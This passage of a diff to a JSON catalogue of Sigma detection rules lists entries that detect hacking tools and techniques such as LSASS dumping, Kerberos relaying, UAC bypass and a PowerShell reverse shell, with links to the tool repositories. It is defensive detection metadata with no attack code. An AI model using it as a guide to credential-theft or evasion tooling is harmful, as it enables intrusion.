download files from the Internet", "meta": { "author": "Florian Roth", - "creation_date": "2022/04/27", + "creation_date": "2020/07/03", "falsepositive": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "filename": "proc_creation_win_hack_cube0x0_tools.yml", + "filename": "proc_creation_win_susp_desktopimgdownldr.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/cube0x0", - "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" - ], - "tags": "No established tags" - }, - "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b", - "value": "Hacktool by Cube0x0" - }, - { - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process 
memory", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/02/04", - "falsepositive": [ - "Very unlikely" - ], - "filename": "proc_creation_win_hack_dumpert.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/outflanknl/Dumpert", - "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", - "value": "Dumpert Process Dumper" - }, - { - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "meta": { - "author": "Vasiliy Burov", - "creation_date": "2020/10/05", - "falsepositive": [ - "Software that uses the caret encased keywords PASS and USER in its command line" - ], - "filename": "proc_creation_win_hack_hydra.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/vanhauser-thc/thc-hydra", - "https://attack.mitre.org/techniques/T1110/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_hydra.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" - ] - }, - "uuid": "aaafa146-074c-11eb-adc1-0242ac120002", - "value": "Hydra Password Guessing Hack Tool" - }, - { - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/24", - "falsepositive": [ - "Very unlikely" - ], - "filename": "proc_creation_win_hack_inveigh.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/Kevin-Robertson/Inveigh", - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", - "value": "Inveigh Hack Tool" - }, - { - "description": "Detects command line parameters used by Koadic hack tool", - "meta": { - "author": "wagga, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2020/01/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_hack_koadic.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", - "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", - "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" - ] - }, - "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", - "value": "Koadic Execution" - }, - { - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/27", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_krbrelay.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/cube0x0/KrbRelay", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ] - }, - "uuid": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", - "value": 
"KrbRelay Hack Tool" - }, - { - "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/26", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_krbrelayup.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Dec0ne/KrbRelayUp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" - ] - }, - "uuid": "12827a56-61a4-476a-a9cb-f3068f191073", - "value": "KrbRelayUp Hack Tool" - }, - { - "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/12/19", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_rubeus.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", - "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", - "https://github.com/GhostPack/Rubeus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558.003", - "attack.lateral_movement", - "attack.t1550.003" - ] - }, - "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", - "value": "Rubeus Hack Tool" - }, - { - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/20", - "falsepositive": [ - "Unlikely" 
- ], - "filename": "proc_creation_win_hack_safetykatz.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/GhostPack/SafetyKatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", - "value": "SafetyKatz Hack Tool" - }, - { - "description": "Detects the execution of SecurityXploded Tools", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/12/19", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_secutyxploded.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securityxploded.com/", - "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555" - ] - }, - "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "value": "SecurityXploded Tool" - }, - { - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/09/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_hack_sharpersist.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", - "https://github.com/mandiant/SharPersist", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" - ], - "tags": [ - "attack.persistence", - 
"attack.t1053" - ] - }, - "uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4", - "value": "SharPersist Usage" - }, - { - "description": "Detects SharpLdapWhoami, a whoami alternative by asking the LDAP service on a domain controller", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/29", - "falsepositive": [ - "Programs that use the same command line flags" - ], - "filename": "proc_creation_win_hack_sharpldapwhoami.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/bugch3ck/SharpLdapWhoami", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" - ] - }, - "uuid": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "value": "SharpLdapWhoami" - }, - { - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/12/04", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_hack_sysmoneop.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Wh04m1001/SysmonEoP", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml" - ], - "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" - ] - }, - "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", - "value": "SysmonEOP Hack Tool" - }, - { - "description": "Detects the use of Windows Credential Editor (WCE)", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/12/31", - "falsepositive": [ - "Another service that uses a single -s command line switch" - ], - "filename": "proc_creation_win_hack_wce.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": 
"windows", - "refs": [ - "https://www.ampliasecurity.com/research/windows-credentials-editor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_wce.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" - ] - }, - "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", - "value": "Windows Credential Editor" - }, - { - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_handlekatz.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/codewhitesec/HandleKatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_handlekatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c", - "value": "HandleKatz LSASS Dumper Usage" - }, - { - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "meta": { - "author": "frack113", - "creation_date": "2021/12/27", - "falsepositive": [ - "Tools that accidentally use the same command line flags and values" - ], - "filename": "proc_creation_win_hashcat.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", - "https://hashcat.net/wiki/doku.php?id=hashcat", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hashcat.yml" - ], - "tags": [ - 
"attack.credential_access", - "attack.t1110.002" - ] - }, - "uuid": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", - "value": "Password Cracking with Hashcat" - }, - { - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", - "meta": { - "author": "Sreeman, Florian Roth", - "creation_date": "2022/01/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_headless_browser_file_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1478234484881436672?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_headless_browser_file_download.yml" + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" ], "tags": [ "attack.command_and_control", "attack.t1105" ] }, - "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", - "value": "File Download with Headless Browser" + "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "value": "Suspicious Desktopimgdownldr Command" }, { - "description": "Identifies usage of hh.exe executing recently modified .chm files.", + "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", "meta": { - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", - "creation_date": "2019/10/24", + "author": "frack113, manasmbellani", + "creation_date": "2022/02/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_wlrmdr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", + "value": "Wlrmdr Lolbin Use as Launcher" + }, + { + "description": "Detects execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/12/05", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_hh_chm.yml", + "filename": "proc_creation_win_renamed_mavinject.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm.yml" + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + 
"https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218.001" - ] - }, - "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", - "value": "HH.exe Execution" - }, - { - "description": "Detects usage of hh.exe to execute/download remotely hosted .chm files.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_hh_chm_http.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", - "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.001" - ] - }, - "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", - "value": "HH.exe Remote CHM File Execution" - }, - { - "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. 
This folder doesn't require admin privillege to be written and executed from.", - "meta": { - "author": "Sreeman", - "creation_date": "2020/04/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_hiding_malware_in_fonts_folder.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hiding_malware_in_fonts_folder.yml" - ], - "tags": [ - "attack.t1211", - "attack.t1059", - "attack.defense_evasion", - "attack.persistence" - ] - }, - "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", - "value": "Writing Of Malicious Files To The Fonts Folder" - }, - { - "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_high_integrity_sdclt.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", - "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" - ], - "tags": [ "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.t1055.001", + "attack.t1218.013" ] }, - "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", - "value": "High Integrity Sdclt Process" + "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "value": "Rename Mavinject Execution" }, { - "description": "Detects the use of CreateMiniDump hack tool used 
to dump the LSASS process memory for credential extraction on the attacker's machine", + "description": "Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell", + "meta": { + "author": "FPT.EagleEye, wagga", + "creation_date": "2021/03/03", + "falsepositive": [ + "Administrative might use this function for checking network connectivity" + ], + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "value": "Powershell Reverse Shell Connection" + }, + { + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "meta": { + "author": "Ivan Dyachkov, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
+ ], + "filename": "proc_creation_win_susp_diskshadow.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_diskshadow.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "value": "Execution via Diskshadow.exe" + }, + { + "description": "Detects netsh commands that configure a port forwarding (PortProxy)", + "meta": { + "author": "Florian Roth, omkar72, oscd.community", + "creation_date": "2019/01/29", + "falsepositive": [ + "Legitimate administration", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. 
https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + ], + "filename": "proc_creation_win_netsh_port_fwd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.dfirnotes.net/portproxy_detection/", + "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", + "value": "Netsh Port Forwarding" + }, + { + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msdt_susp_parent.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" + ] + }, + "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", + "value": "MSDT Executed with Suspicious Parent" + }, + { + "description": "Detects a set of suspicious network related commands often used in recon stages", "meta": { "author": "Florian Roth", - "creation_date": "2019/12/22", + "creation_date": "2022/02/07", "falsepositive": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "filename": 
"proc_creation_win_hktl_createminidump.yml", + "filename": "proc_creation_win_susp_recon_network_activity.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ] + }, + "uuid": "e6313acd-208c-44fc-a0ff-db85d572e90e", + "value": "Network Reconnaissance Activity" + }, + { + "description": "Detects the PowerShell command lines with special characters", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unlikely", + "Amazon SSM Document Worker", + "Windows Defender ATP" + ], + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "value": "Suspicious PowerShell Command Line" + }, + { + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "meta": { + "author": "Florian 
Roth", + "creation_date": "2022/04/21", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_rundll32_keymgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/NinjaParanoid/status/1516442028963659777", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml" ], "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1555.004" ] }, - "uuid": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", - "value": "CreateMiniDump Hacktool" + "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "value": "Suspicious Key Manager Access" }, { - "description": "Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata", + "description": "Detects Netsh commands that allows a suspcious application location on Windows Firewall", "meta": { - "author": "Christian Burkard, Florian Roth", - "creation_date": "2021/08/30", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/05/25", "falsepositive": [ - "Unknown" + "Legitimate administration" ], - "filename": "proc_creation_win_hktl_uacme_uac_bypass.yml", + "filename": "proc_creation_win_netsh_fw_add_susp_image.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml" + "https://www.virusradar.com/en/Win32_Kasidet.AD/description", + "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml" ], "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - 
"attack.t1548.002" + "attack.t1562.004" ] }, - "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", - "value": "UAC Bypass Tool UACMe Akagi" + "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "value": "Netsh Program Allowed with Suspcious Location" + }, + { + "description": "Detects activity mentioned in Operation Wocao report", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2019/12/20", + "falsepositive": [ + "Administrators that use checkadmin.exe tool to enumerate local administrators" + ], + "filename": "proc_creation_win_apt_wocao.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "value": "Operation Wocao Activity" + }, + { + "description": "Local accounts, System Owner/User discovery using operating systems utilities", + "meta": { + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user enumerates local users for legitimate reason" + ], + "filename": "proc_creation_win_local_system_owner_account_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_local_system_owner_account_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1087.001" + ] + }, + "uuid": "502b42de-4306-40b4-9596-6f590c81f073", + "value": "Local Accounts Discovery" + }, + { + "description": "This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbins_by_office_applications.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", + "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "23daeb52-e6eb-493c-8607-c4f0246cb7d8", + "value": "New Lolbin Process by Office Applications" }, { "description": "Detects a suspicious child process of a Microsoft HTML Help 
system when executing compiled HTML files (.chm)", 
